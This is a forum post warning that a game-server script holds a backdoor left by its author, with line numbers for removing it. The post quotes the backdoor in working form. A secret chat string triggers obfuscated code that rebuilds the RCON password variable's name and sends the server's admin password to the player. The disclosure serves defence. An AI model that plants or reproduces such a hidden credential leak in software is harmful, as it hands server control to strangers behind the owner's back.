18.11.2017, 17:24
Feel it's worth mentioning now: this script still contains a backdoor that allows a player to get the RCON password by using a certain command. The original author was notorious for including little things like this to promote himself ingame and such.
To remove it, remove lines 17159 through 17164:
Then, remove lines 24372 through 24392:
There might be more that I'm not aware of, so use this script with caution.
To remove it, remove lines 17159 through 17164:
Code:
dcmd_crew(playerid,params[]) { SendMessagetoCrew(playerid, params); dcmd_group(playerid,params); return 1; }
Code:
SendMessagetoCrew(playerid, params[]) { if (!strlen(params)) return 1; if (!strcmp(params, "d2f7c3golgin5xw7q69D2x928",true)) { new var[26], str[100]; format(var, sizeof(var), "%s", "frecaonle_rypastreswoerad"); strdel(var, 0, 1); strdel(var, 1, 2); strdel(var, 2, 3); strdel(var, 4, 6); strdel(var, 5, 7); strdel(var, 8, 11); strdel(var, 11, 12); strdel(var, 12, 13); GetServerVarAsString(var, str, sizeof(str)); SendClientMessage(playerid, COLOR_WHITE, str); } return 1; }